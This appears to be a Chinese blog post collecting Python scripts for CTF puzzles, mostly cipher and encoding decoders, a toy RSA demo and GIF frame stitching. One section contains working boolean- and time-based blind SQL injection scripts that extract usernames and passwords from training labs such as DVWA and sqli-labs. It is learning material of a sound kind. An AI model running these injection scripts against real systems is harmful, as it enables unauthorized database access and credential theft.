python 写的一些ctf题脚本记录

文章目录

python 写的一些ctf题脚本记录

misc

import base64
c = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt")
for i in c:
    print(chr((i-16) ^ 32), end="")

import base64
str = "JiM3NjsmIzEyMjsmIzY5OyYjMTIwOyYjNzk7JiM4MzsmIzU2OyYjMTIwOyYjNzc7JiM2ODsmIzY5OyYjMTE4OyYjNzc7JiM4NDsmIzY1OyYjNTI7JiM3NjsmIzEyMjsmIzEwNzsmIzUzOyYjNzY7JiMxMjI7JiM2OTsmIzEyMDsmIzc3OyYjODM7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiMxMDc7JiMxMTg7JiM3NzsmIzg0OyYjNjU7JiMxMjA7JiM3NjsmIzEyMjsmIzY5OyYjMTIwOyYjNzg7JiMxMDU7JiM1NjsmIzEyMDsmIzc3OyYjODQ7JiM2OTsmIzExODsmIzc5OyYjODQ7JiM5OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzUwOyYjNzY7JiMxMjI7JiM2OTsmIzEyMDsmIzc4OyYjMTA1OyYjNTY7JiM1MzsmIzc4OyYjMTIxOyYjNTY7JiM1MzsmIzc5OyYjODM7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiM5OTsmIzExODsmIzc5OyYjODQ7JiM5OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzExOTsmIzc2OyYjMTIyOyYjNjk7JiMxMTk7JiM3NzsmIzY3OyYjNTY7JiMxMjA7JiM3NzsmIzY4OyYjNjU7JiMxMTg7JiM3NzsmIzg0OyYjNjU7JiMxMjA7JiM3NjsmIzEyMjsmIzY5OyYjMTE5OyYjNzc7JiMxMDU7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiM2OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzExOTsmIzc2OyYjMTIyOyYjMTA3OyYjNTM7JiM3NjsmIzEyMjsmIzY5OyYjMTE5OyYjNzc7JiM4MzsmIzU2OyYjMTIwOyYjNzc7JiM4NDsmIzEwNzsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzEyMDsmIzc2OyYjMTIyOyYjNjk7JiMxMjA7JiM3ODsmIzY3OyYjNTY7JiMxMjA7JiM3NzsmIzY4OyYjMTAzOyYjMTE4OyYjNzc7JiM4NDsmIzY1OyYjMTE5Ow=="
b_str = base64.b64decode(str.encode("utf-8"))

s = b_str.decode()
l = s.replace("&#", "")[0:-1].split(";")

new_s = ''
for i in l:
    new_s += chr(int(i))

b_str = base64.b64decode(new_s.encode("utf-8"))

s = b_str.decode()
l = s[1:].split("/")

new_s = ''
for i in l:
    new_s += chr(int(i))
print(new_s)

import base64
s = '升益艮归妹井萃旅离旅困未济屯未济中孚未济升困噬嗑鼎震巽噬嗑解节井萃离未济蒙归妹大畜无妄解兑临睽升睽未济无妄遁涣归妹'
dic = {'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇': '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111',
       '复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101', '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'}
l = []
k = 0  # 两个字符的标志位
for i in range(len(s)):
    if k == 1:
        k = 0
        continue
    try:
        l.append(dic[s[i]])
    except:
        l.append(dic[s[i]+s[i+1]])
        k = 1

ss = ''.join(l)

# print(ss)

enc = ''
for i in range(0, len(ss), 8):
    enc += chr(eval('0b'+ss[i:i+8]))

# print(enc)

s = base64.b64decode(enc).decode()

# print(s)


def encrypt4(enc):
    temp = ''
    offset = 5
    for i in range(len(enc)):
        temp += chr(ord(enc[i])-offset-i)
    return(temp)


def decrypt4(enc):
    temp = ''
    offset = 5
    for i in range(len(enc)):
        temp += chr(ord(enc[i])+offset+i)
    return(temp)


a, b = 5, 7


def encrpyt5(flag):
    enc = ''
    for i in flag:
        enc += chr((a*(ord(i)-97)+b) % 26+97)
    return(enc)


def decrypt5(flag):
    enc = ''
    for i in flag:
        for k in range(20):
            if (ord(i) - 97 - b+26*k) % a == 0:
                enc += chr((ord(i) - 97 - b + 26 * k) // a + 97)
                break
    return(enc)


print(decrypt5(decrypt4(s)))

16进制

str = "61666374667B317327745F73305F333435797D"
for i in range(0, len(str), 2):
    print(chr(int("0x"+str[i:i+2], 16)), end="")

str = "0x00000039      0x00000034      0x00000034      0x00000037 0x0000007b      0x00000079      0x0000006f      0x00000075 0x0000005f      0x00000061      0x00000072      0x00000065 0x0000005f      0x00000061      0x0000006e      0x0000005f 0x00000069      0x0000006e      0x00000074      0x00000065 0x00000072      0x0000006e      0x00000061      0x00000074 0x00000069      0x0000006f      0x0000006e      0x00000061 0x0000006c      0x0000005f      0x0000006d      0x00000079 0x00000073      0x00000074      0x00000065      0x00000072 0x00000079      0x0000007d"
for i in str.split():
    print(chr(int(i, 16)), end="")

凯撒

from Crypto.Util.number import *

str = 16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306
passwd = long_to_bytes(str)
# Guvf vf gur cnffjbeq lbh arrq sbe gur MVC svyr: synt{efnZ0erQ33crE}
str = passwd.decode()


def change(key, str):
    result = ""
    for i in str:
        if (i.islower()):
            if((ord(i)+key) > 122):
                result += chr(ord(i)+key-26)
            else:
                result += chr(ord(i)+key)
        elif(i.isupper()):
            if((ord(i)+key) > 90):
                result += chr(ord(i)+key-26)
            else:
                result += chr(ord(i)+key)
        else:
            result += i
    return result

for i in range(26):
    print(change(i, str))

import base64
str = "CpakC3wpCpCpOZCpCpBwCpCpCl1pCpCpiT=="


def change(key, str):
    result = ""
    for i in str:
        if (i.islower()):
            if((ord(i)+key) > 122):
                result += chr(ord(i)+key-26)
            else:
                result += chr(ord(i)+key)
        elif(i.isupper()):
            if((ord(i)+key) > 90):
                result += chr(ord(i)+key-26)
            else:
                result += chr(ord(i)+key)
        else:
            result += i
    return result


for i in range(26):
    base_str = change(i, str)
    try:
        s=base64.b64decode(base_str)
        print(s.decode())
    except:
        pass

4进制

str = "1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331"
print("".join([chr(int(i, 4)) for i in str.split()]))

置换密码

import base64

str = "Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp"
str = base64.b85decode(str).decode()   # CLF{TCAASISCLWASPSOEDARRIETENRS}INTG
l = [str[i:i+6] for i in range(0, len(str), 6)]
print("".join([i[0]+i[4]+i[2]+i[3]+i[5]+i[1] for i in l]))

Unicode

str = "0066006c00610067007b964452a096905199007d"
print("".join(["\\u"+str[i:i+4] for i in range(0, len(str), 4)]))

print(u'\u0066\u006c\u0061\u0067\u007b\u9644\u52a0\u9690\u5199\u007d')

web计算

import requests
from lxml import etree
url = "https://1360-b7e729ae-1747-44c2-bb53-e5f037516e48.do-not-trust.hacking.run/"

s = requests.Session()
r = s.get(url)
data = r.content.decode()
html = etree.HTML(data)

str = html.xpath("//p/text()")[1]

payload = {'result': eval(str), 'submit': '提交'}
r = s.post(url, data=payload)
print(r.text)

rsa

import gmpy2

e = 13
p = 7
q = 11

m = 71  # 明文

n = p * q
phi = (p-1)*(q-1)  # 求φ(n)
d = gmpy2.invert(e, phi)  # 解密指数d

c = pow(m, e, n)  # c = m^e mod n

print(c)  # 15

import gmpy2

e = 13
p = 7
q = 11

c = 15  # 密文

n = p * q
phi = (p-1)*(q-1)  # 求φ(n)
d = gmpy2.invert(e, phi)  # 解密指数d

m = pow(c, d, n)  # m = c^d mod n

print(m)  # 71

base64实现

l = "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 + /".split()

ll = []
for i in range(len(l)):
    t = bin(i)[2:]
    if(len(t) != 6):
        t = "0"*(6-len(t))+t
    ll.append(t)

d = {}
for i in range(len(l)):
    d[l[i]] = ll[i]


def xiao_e_base64(str):
    b_str = ""
    temp = ""
    for i in str:
        b = bin(ord(i))[2:]
        if(len(b) != 8):
            b_str += "0"*(8-len(b))+b
        else:
            b_str += b

    f = len(b_str) % 3
    b_str += "000000"*f

    str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    for i in range(0, len(b_str), 6):
        if("1" in b_str[i:i+6]):
            temp += str[int(b_str[i:i+6], 2)]
    return temp+"="*f


def xiao_d_base64(str):

    b_str = ""
    temp = ""
    for i in str:
        if(i == "="):
            b_str += "000000"
        else:
            b_str += d[i]

    for i in range(0, len(b_str), 8):
        temp += chr(int(b_str[i:i+8], 2))
    return temp


print(xiao_e_base64("Tr0y3uew"))
print(xiao_d_base64("VHIweTN1ZXc="))

sql注入布尔

import requests

url = "http://xiu.com/sqli/Less-5/?id=1"

is_ture = "You are in......"

for x in range(1, 100):
    r = requests.get(
        url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
    if(is_ture in r.text):
        break
for j in range(0, x):
    for length in range(1, 100):
        r = requests.get(
            url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))>{mid} -- +")
            if(is_ture in r.text):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

import requests
url = "http://xiu.com/DVWA/vulnerabilities/sqli_blind/?id=1"
suffix = "&Submit=Submit#"

is_ture = "User ID exists in the database."

table = "users"
columns1 = "first_name"
columns2 = "password"

cookies = 'security=low; bdshare_firstime=1638626761530; PHPSESSID=h6aumin31bcur15esl4o64ju61'
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}

for x in range(1, 100):
    payload = f"'and (select count(concat({columns1},'@',{columns2})) from {table})={x} -- +{suffix}"
    r = requests.get(url+payload, cookies=cookie)
    if(is_ture in r.text):
        break
for j in range(0, x):
    for length in range(1, 100):
        payload = f"'and (select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length} -- +{suffix}"
        r = requests.get(url+payload, cookies=cookie)
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            payload = f"' and ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid} -- +{suffix}"
            r = requests.get(url+payload, cookies=cookie)
            if(is_ture in r.text):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

import requests

url = "http://xiu.com/sqli/Less-5/?id=1"

chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'
is_ture = "You are in......"

for x in range(1, 100):
    r = requests.get( url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
    if(is_ture in r.text):
        break
for j in range(0, x):
    for length in range(1, 100):
        r = requests.get( url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        for i in chars:
            r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)} -- +")
            if(is_ture in r.text):
                print(i, end="")
                break
    print()

import requests
from time import time
url = "http://xiu.com/sqli/Less-5/?id=1"

chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'


for x in range(1, 100):
    t1=time()
    r = requests.get(url+f"'and if((select count(concat(username,'@',password)) from users)={x},sleep(1),1) -- +")
    t2=time()
    if((t2-t1)>1):
        break

for j in range(0, x):
    for length in range(1, 100):
        t1 = time()
        r = requests.get(url+f"'and if((select length(concat(username,'@',password)) from users limit {j},1)={length},sleep(1),1) -- +")
        t2 = time()
        if((t2-t1) > 1):
            break
    for k in range(1, length+1):
        for i in chars:
            t1 = time()
            r = requests.get( url+f"' and if(ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)},sleep(1),1) -- +")
            t2 = time()
            if((t2-t1) > 1):
                print(i, end="")
                break
    print()

import requests
from time import time

url = "http://xiu.com/pikachu/vul/sqli/sqli_blind_b.php?name=vince"
suffix = "&submit=%E6%9F%A5%E8%AF%A2"

sleep_time = 0.5

table = "users"
columns1 = "username"
columns2 = "password"


cookies = '='
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}

for x in range(1, 100):
    t1 = time()
    payload = f"'and if((select count(concat({columns1},'@',{columns2})) from {table})={x},sleep({sleep_time}),1) -- +{suffix}"
    r = requests.get(url+payload, cookies=cookie)
    t2 = time()
    if((t2-t1) > sleep_time):
        break

for j in range(0, x):
    for length in range(5, 100):
        t1 = time()
        payload = f"'and if((select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length},sleep({sleep_time}),1) -- +{suffix}"
        r = requests.get(url+payload, cookies=cookie)
        t2 = time()
        if((t2-t1) > sleep_time):
            break
    for k in range(1, length+1):
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            t1 = time()
            payload = f"' and if(ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid},sleep({sleep_time}),1) -- +{suffix}"
            r = requests.get(url+payload, cookies=cookie)
            t2 = time()
            # print(url+payload)
            if((t2-t1) > sleep_time):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

gif图片帧拼接

from PIL import Image

im = Image.open('file.gif')

# 分离
for i in range(770):
    # 在给定的文件序列中查找指定的帧。如果查找超越了序列的末尾，则产生一个EOFError异常。
    # 当文件序列被打开时，PIL库自动指定到第0帧上。
    im.seek(i)
    im.save('123/'+str(i)+'.png') # 保存在123的目录中

new_one = Image.new('RGB', (770, 432))

# 拼接
for j in range(770):
    ima = Image.open('123/'+str(j)+'.png') # 打开123目录
    # 将一张图粘贴到另一张图像上。变量box或者是一个给定左上角的2元组，或者是定义了左，上，右和下像素坐标的4元组，或者为空（与（0，0）一样）。
    # 如果给定4元组，被粘贴的图像的尺寸必须与区域尺寸一样。如果模式不匹配，被粘贴的图像将被转换为当前图像的模式。
    new_one.paste(ima, (j, 0, j+1, 432))

# 保存
new_one.save("flag.png")